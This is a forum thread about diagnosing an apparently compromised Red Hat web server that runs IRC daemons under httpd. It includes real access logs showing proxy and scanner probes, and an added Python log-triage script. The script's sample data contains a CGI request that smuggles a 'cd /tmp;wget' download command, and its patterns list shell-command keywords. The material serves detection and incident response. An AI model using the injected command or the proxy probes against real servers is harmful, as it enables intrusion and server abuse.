What is the best way to secure httpd?
I would like to know what is the best way to secure httpd. I sometimes have IRCDs that appear, and when I check using netstat -p they are using httpd to run on my server. I want to put an end to this quickly. What is the best method? Will mod_security do the trick?
If you are seeing ircd being run by the httpd user, then your machine has likely been compromised. At this point it's important to determine the severity of the compromise and determine how the attacker was able to access the system. Simply re-installing or adding on mod_security may not help if the vulnerable application is still present.
First, could you post what distro/version of Linux you're using, whether it has been fully updated with security patches, and the output from netstat (netstat -pantu) that made you suspicious. Also please list all web applications that you are using with httpd, such as PHP, bulletin-board apps, CGI/Perl scripts, other apps like awstats, etc. Second, take a look at the httpd logs to see if you can find any URL entries containing bash commands like wget, cd, uname, etc. or anything else suspicious. Please post any that you find. Third, check /tmp and /var/tmp for any abnormal files or dirs, especially anything owned by the httpd user. I'd also highly recommend using a tool like rkhunter or chkrootkit to search for the presence of rootkits.
I am using Linux ES 4 Redhat. It has been fully updated with all the security updates through cPanel. I don't see anything running there now after typing the netstat -pantu command. I saw a lot of bandwidth going out of my two servers and then contacted my support tech; he told me it was because of irc running and to check using netstat. I am not using any web application; the server, which was new, was online a few hours before being used by irc. How do I look at the httpd logs? I got the following from looking at /usr:
Code:
root@cpanel [/usr]# dir ./ aquota.user* doc/ games/ kerberos/ libexec/ lost+found/ ofed/ sbin/ src/ X11R6/ ../ bin/ etc/ include/ lib/ local/ man/ quota.user* share/ tmp@
I got the following from looking at /tmp and /var/tmp:
Code:
/ generic/ nobody-session-0.842404411946521 sess_68d43263b55564197e57bd59b9396c32 ../ .ICE-unix/ original.2.6.9-42.0.3.2006-12-2323:23:54.bootdir.backup.gz sess_c08e836dd0ba1ccc181073b8effb1bde aquota.user* lost+found/ pear/ sess_d35238a33fe340e07420fee2b6a16c98 cpbandwidth/ mysql.sock@ quota.user* sess_d811acaba5edae67779b2a86924609b2
I don't see anything that is abnormal. When I did find out about the ircd thing I logged into the server and found 1-2 txt files and 1-2 files with the .c extension and deleted those. There was nothing installed by the looks of it and also no real signs of someone breaking in. I have BSD installed on one server; if someone was going to break into it I would have got an email telling me. I also asked my tech support if I should reinstall the OS; he said no because it was nothing major.
I think I have solved the problem; it might be an SSH issue. My server 1, which is more secure than server 2, has not had any ircd running so far, and server 2 got ircd running on it just now; then I restarted httpd and it has gone. I have my IP range set on server 1 for SSH. Do you think there can be any files that I don't know about on the server?
Seeing abnormal processes owned by httpd is usually indicative of someone either directly compromising (or abusing) the http service or content that is executed by the httpd process, such as PHP, CGI, etc. Often a vulnerability will allow execution of arbitrary commands, which allows an attacker to upload files or execute commands (such as ircd) with the privileges of the httpd user. This is why you'll find files or processes owned by httpd. Often the next step is to upload exploits to perform a privilege elevation attack (via a local root exploit) to allow the attacker to fully compromise the system. So it's important to determine what has occurred on the system. Alternatively, the server is initially compromised by some other means and the httpd binary replaced by a trojaned version to hide the presence of the intruder.
Code:
root@cpanel [/var/log/httpd]# dir
./ ../
root@cpanel [/var/log/httpd]#
Assuming that they didn't identify the vulnerable Linux server first and then specifically target it rather than the BSD system. Is the BSD system running some sort of IDS?

What do you mean by IDS?
Code:
find / -name access_log
I installed and ran rkhunter-1.2.9 on a server that was used by the IRCD and I got the following:
Code:
- GnuPG 1.2.6 [ Old or patched v
- OpenSSL 0.9.7a [ Old or patched v
The two above are in yellow and according to this are vulnerable applications, and the rest are all fine since they are in green. I might be wrong, but I think that the ircd gained access through root and then maybe was used through httpd. I'm making this conclusion because this server has had SSH secured by only allowing my IP range and I have not seen IRCD since yesterday, while the other server has.
Code:
64.62.190.36 - - [24/Dec/2006:18:55:59 -0600] "CONNECT 64.62.190.36:6667 HTTP/1.0" 405 307
64.62.190.36 - - [24/Dec/2006:18:55:59 -0600] "POST http://64.62.190.36:6667/ HTTP/1.0" 405 304
209.132.209.54 - - [24/Dec/2006:18:55:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 411
64.62.190.36 - - [24/Dec/2006:18:56:30 -0600] "CONNECT 64.62.190.36:6667 HTTP/1.0" 405 307
64.62.190.36 - - [24/Dec/2006:18:56:30 -0600] "POST http://64.62.190.36:6667/ HTTP/1.0" 405 304
217.174.199.221 - - [25/Dec/2006:14:00:03 -0600] "CONNECT 195.225.204.235:6667 HTTP/1.0" 405 307
217.174.199.221 - - [25/Dec/2006:14:00:03 -0600] "POST http://195.225.204.235:6667/ HTTP/1.0" 405 304
217.174.199.221 - - [25/Dec/2006:14:00:03 -0600] "GET http://vega.epiknet.org/bopmcheck.txt HTTP/1.0" 404 -
Those log messages all appear to have 400 status codes, meaning they failed. Anything in the logs with 200 http status codes? (Look at the 2nd to last field in each entry.)
Also, do you remember where you found the strange files? Who owned them?
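Added example, not from this thread: a small Python triage script that applies the checks the earlier reply suggests (shell words such as wget, cd or uname in request URLs, proxy-style CONNECT/POST requests to IRC port 6667, the w00tw00t scanner probe) to the Apache access_log format pasted in this thread, and marks any flagged request that was answered with a 2xx status, which is the question asked just above. The first three sample lines are entries from this thread; the 203.0.113.9 line is constructed.

```python
import re
from urllib.parse import unquote

# Apache common log entry as pasted in this thread: ip ident user [ts] "request" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)')
# Shell words the reply suggests looking for, matched as separate tokens in the decoded URL
SHELL_WORDS = re.compile(r'(?<=[;|&=?\s])(wget|curl|uname|cd|chmod)(?=[\s;|&]|$)', re.I)
IRC_PORT = re.compile(r':6667(?:\D|$)')   # IRC port reached through the web server
SCANNER = 'w00tw00t'                       # DFind scanner signature seen in the thread

SAMPLE_LOG = [  # constructed sample: the first three entries are from this thread, the fourth is made up
    '64.62.190.36 - - [24/Dec/2006:18:55:59 -0600] "CONNECT 64.62.190.36:6667 HTTP/1.0" 405 307',
    '64.62.190.36 - - [24/Dec/2006:18:55:59 -0600] "POST http://64.62.190.36:6667/ HTTP/1.0" 405 304',
    '209.132.209.54 - - [24/Dec/2006:18:55:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 411',
    '203.0.113.9 - - [26/Dec/2006:03:12:44 -0600] "GET /cgi-bin/x.cgi?cmd=cd%20/tmp;wget%20example.invalid/a HTTP/1.0" 200 512',
]

def parse_line(line):
    """One access_log entry as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e['status'] = int(e['status'])
    e['decoded'] = unquote(e['target'])   # %20 etc. hide commands in the raw log text
    return e

def reasons(e):
    """Why an entry deserves a look; an empty list means nothing stood out."""
    why = []
    if SHELL_WORDS.search(e['decoded']):
        why.append('shell command in URL')
    if e['method'] == 'CONNECT' or e['target'].startswith(('http://', 'https://')):
        why.append('proxy-style request' + (' to IRC port 6667' if IRC_PORT.search(e['target']) else ''))
    if SCANNER in e['target']:
        why.append('known scanner probe (noise)')
    if why and 200 <= e['status'] < 300:
        why.append('served with 2xx: investigate')   # answered, not merely rejected
    return why

def triage(lines):
    """Flagged entries, each with a 'reasons' list, in log order."""
    flagged = []
    for e in filter(None, map(parse_line, lines)):
        e['reasons'] = reasons(e)
        if e['reasons']:
            flagged.append(e)
    return flagged
```

Run it over a real access_log by passing `open(path)` to `triage`; entries whose reasons end with the 2xx note are the ones worth pulling the matching /tmp files and process list for.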
Code:
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413
Those URLs are common scans. If you received a lot of those in a short time, it would certainly use up bandwidth. But it doesn't look to be related to the compromise.
BTW, sorry for taking so long to get back to you, but my family and I have been fighting off a stomach virus for the last 3 days.
In a nutshell: if root access was gained, you cannot trust anything in the compromised system. You should therefore immediately unplug the system from any network, be it LAN or WAN, to avoid the risk that your system is abusing other systems in the local network or on the internet; make a byte-to-byte copy of the system for later analysis; and reinstall the system from trusted media.